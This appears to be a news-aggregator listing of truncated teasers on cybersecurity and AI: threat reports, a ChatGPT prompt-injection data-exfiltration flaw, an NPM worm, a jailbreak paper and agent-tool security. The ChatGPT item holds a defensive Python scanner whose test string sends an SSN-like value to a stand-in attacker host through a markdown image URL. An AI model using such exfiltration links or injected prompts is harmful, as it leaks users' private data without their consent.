
SonicWall has launched its 2026 Cyber Protect Report, marking a significant shift in how the organization presents threat intelligence. Rather than focusing solely on raw data, the report prioritizes protection outcomes for business leaders. The findings indicate that while the volume of attacks remains high, adversaries are becoming more precise, with medium- and high-severity incidents rising by over 20% to reach 13 billion hits.

One of the most significant findings in the 2026 report is the

The idea that artificial intelligence might one day rival human creativity has become a familiar theme in public conversation. Generative models can rapidly produce images, stories and designs, which makes it tempting to assume that they possess something like imagination. A new study published in Advanced Science challenges that assumption in a direct and illuminating way. By examining how humans and AI generate images from abstract prompts, the researchers show that what looks like creativity

Senior business leaders in the UK are experiencing a significant rise in job complexity, with artificial intelligence (AI) identified as a primary driver. A study by Alliance Manchester Business School (AMBS), based on a Censuswide survey of 500 UK managers, directors, and C-suite executives, reveals that almost three quarters (73%) of senior management have found their roles more complex since 2020 because of AI. This figure climbs to 79% among directors and C-suite personnel, and 82% among m

Users frequently entrust AI assistants with highly sensitive information, including medical records, financial documents, and proprietary business code. Check Point researchers have disclosed a critical vulnerability in ChatGPT's architecture that enables attackers to extract user data covertly. A flaw in ChatGPT's code execution environment demonstrated how a single malicious prompt could quietly exfiltrate sensitive user data without warning or user approval.[1]

The Vulnerability - OpenAI de
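One common variant of this attack class (a general illustration, not Check Point's specific finding) is prompt-injected output that embeds user data in the URL of a markdown image, which the client then fetches automatically. A minimal, hypothetical output-scanning mitigation might look like this; the `ALLOWED_DOMAINS` allowlist and function names are illustrative assumptions:

```python
import re

# Hypothetical allowlist: domains the assistant client may render images from.
ALLOWED_DOMAINS = {"cdn.example.com"}

# Markdown image syntax ![alt](url) is a classic covert channel: an injected
# prompt can make the model smuggle user data out in the URL's query string.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def flag_exfiltration(markdown: str) -> list[str]:
    """Return image URLs in model output that point outside the allowlist."""
    suspicious = []
    for url in MD_IMAGE.findall(markdown):
        domain = url.split("/")[2]
        if domain not in ALLOWED_DOMAINS:
            suspicious.append(url)
    return suspicious

output = "Here is your chart: ![img](https://attacker.test/log?data=SSN-123)"
print(flag_exfiltration(output))
```

Scanning rendered output is only one layer; the underlying fix is to block outbound fetches from the model's execution environment entirely.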

If there's one thing that AI is good at, particularly language models, it's detecting patterns, quickly and accurately, in datasets so large that it would be practically impossible for humans to sift through them all. That certainly seems to be the case with Anthropic's new general-purpose model, Claude Mythos: the company has announced that it used the model to detect "thousands of high-severity vulnerabilities, including some in every major operating system and web browser."

Alongside the launch o

On 28 February 2026, a joint US-Israeli military campaign struck Iranian nuclear facilities, military infrastructure, and leadership targets in what was officially called Operation Epic Fury. Social media quickly flooded with false footage of the conflict, including massive explosions in Tel Aviv, successful Iranian missile strikes on US warships, and satellite imagery purporting to show damage to American military bases in the Gulf.

Some of this footage was recycled from unrelated conflicts,

If you've been using OpenClaw, the wildly popular AI agentic tool that took the developer community by storm, you should probably update it if you haven't already. As has been reported in the past, OpenClaw has well-known security problems. From the beginning, OpenClaw creator Peter Steinberger has warned potential users on GitHub that "There is no 'perfectly secure' setup." Users can grant OpenClaw control over their devices and access to specific apps, local files, and logged-in accou

Trend Micro, now rebranded as TrendAI, has published findings from a global study of 3,700 business and IT decision makers showing that 67% felt pressured to approve artificial intelligence projects despite security concerns. One in seven described those concerns as extreme, yet overrode them to match competitors and meet internal demands.

Chief Platform and Business Officer and Head of TrendAI, Rachel Jin, commented: “Organizations are not lacking awareness of risk; they’re lacking the conditions t

Every time you check your bank balance online, send an email, or make a purchase with a credit card, your information is encrypted: a mathematical shield keeps your data protected from prying eyes. This encryption has worked extremely well for decades. The algorithms safeguarding your most sensitive data would take today's most powerful traditional computers millions of years to crack. However, a new type of machine is emerging that could change everything. That machine is the quantum c
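The "millions of years" claim rests on the fact that breaking RSA-style encryption classically requires factoring a huge number, and naive factoring takes on the order of sqrt(N) steps, which grows exponentially with key length. A toy sketch with deliberately tiny primes (real moduli use primes of roughly 1024 bits each) makes the point; Shor's algorithm on a sufficiently large quantum computer would instead run in polynomial time:

```python
import math

def trial_factor(n: int) -> tuple[int, int]:
    """Factor a semiprime by trial division: ~sqrt(n) steps on a classical machine."""
    for p in range(2, math.isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError("input is prime")

# A toy 'RSA modulus' built from two small primes. For a real 2048-bit modulus,
# sqrt(n) is astronomically large: that gap is the classical shield.
print(trial_factor(101 * 113))  # (101, 113)
```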

Security researchers have uncovered a new supply chain attack targeting the NPM registry with malicious code that exhibits worm-like propagation capabilities. Named Sandworm_Mode, the attack was deployed through 19 packages published under two aliases, which relied on typosquatting to trick developers into executing the malicious code. According to cybersecurity firm Socket, the attack bears the hallmarks of the Shai-Hulud campaign that hit roughly 800 NPM packages in September and November 2

Artificial intelligence is becoming woven into the fabric of daily life, from helping doctors summarize medical notes to assisting developers with complex code. As these systems move from novelty to infrastructure, the central question is no longer what they can do, but what happens when they are pushed to do what they should not. A recent research paper titled Jailbreaking the Matrix: Nullspace Steering for Controlled Model Subversion and a companion article from TechXplore explore this quest

Drones have emerged as a significant security concern for US military bases and critical infrastructure. These unmanned systems are typically low-cost, simple to operate, and difficult to detect using traditional air-defense sensors. A single drone can be deployed for surveillance, smuggling, or disruption, creating a scenario where security forces must respond swiftly without overreacting. To address this challenge, the US Army is adopting a new counter-drone platform known as DroneArmor. D

In the 1980s, the rock group The Who had a hit song, "Who Are You." That was rock 'n' roll, but the question now is "Is it real, or is it fake?" Who are you? In modern digital enterprises, the fastest-growing identity population is no longer human users; it is machine identity. APIs, microservices, containers, cloud workloads, CI/CD pipelines, robotic process automation, and AI agents all authenticate using identities. Each relies on credentials such as keys, certificates

The past few years have brought an extraordinary shift in how digital content is created. Videos and images that once required studios, actors, and expensive equipment can now be produced by generative deep learning models that run on a laptop. These systems can fabricate a person's face, voice, and gestures with such precision that the results often look indistinguishable from real footage. This technological leap has opened remarkable creative possibilities, yet it has also created a new kind

Quorum Cyber has published its 2026 Global Cyber Risk Outlook report[1], detailing a significant evolution in cyber threats driven by Artificial Intelligence (AI) and Ransomware-as-a-Service (RaaS) platforms. The analysis, based on incidents across more than 350 organizations worldwide in 2025, indicates that cybercrime has entered a more industrialized phase. This development allows even poorly skilled attackers to launch sophisticated operations, with nation-state actors automating up to 90%

Sentinel Labs has provided a keen look at LLMs in SOC operations. For security teams, AI promised to write secure code, identify and patch vulnerabilities, and replace monotonous security operations tasks. Its key value proposition was raising costs for adversaries while lowering them for defenders.

To evaluate whether Large Language Models (LLMs) were both sufficiently performant and reliable to be deployed in the enterprise, a wave of new benchmarks was created.  In 2023, these early benc

AI coding assistants are no longer just autocompleting lines of code; they are quietly making decisions for you. Tools like Claude Code are able to read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight. To make this possible, these assistants rely on plugin marketplaces, where third-party developers can enable 'skills' that teach the agent how to manage infrastructure, testing, and dependencies. Though powerful, the model requires a high d

As the digital landscape continues to evolve, so too do the threats that organizations must contend with. In this year's final Reporter's Notebook conversation, cybersecurity experts Rob Wright from Dark Reading, David Jones from Cybersecurity Dive, and Alissa Irei from TechTarget Search Security share their insights on what the future holds for cybersecurity in 2026. Drawing from AI-summarized industry reports and expert opinions, the conversation highlights key trends, challenges, and oppor

As the digital landscape evolves, 2026 is shaping up to be a turning point for cybersecurity. AI, quantum computing, and increasingly sophisticated threat actors are reshaping how both businesses and individuals think about digital risk. Drawing on his experience as a founder and CEO in the cybersecurity space, Forbes Councils Member Vytautas Kaziukonis shares his views on three major cybersecurity trends shaping 2026 and what they mean for companies and users alike.[1]

  1. AI stays in

Cybersecurity researchers at ESET have uncovered a troubling new trend in cybercrime: hackers are now using AI-generated malware to intercept payments made through Near Field Communication (NFC)-enabled devices. This advanced malware is capable of relaying sensitive payment card data, carrying out fraudulent online purchases, and even enabling unauthorized withdrawals from Automated Teller Machines (ATMs). The discovery highlights how cybercriminals are rapidly adopting artificial intelligence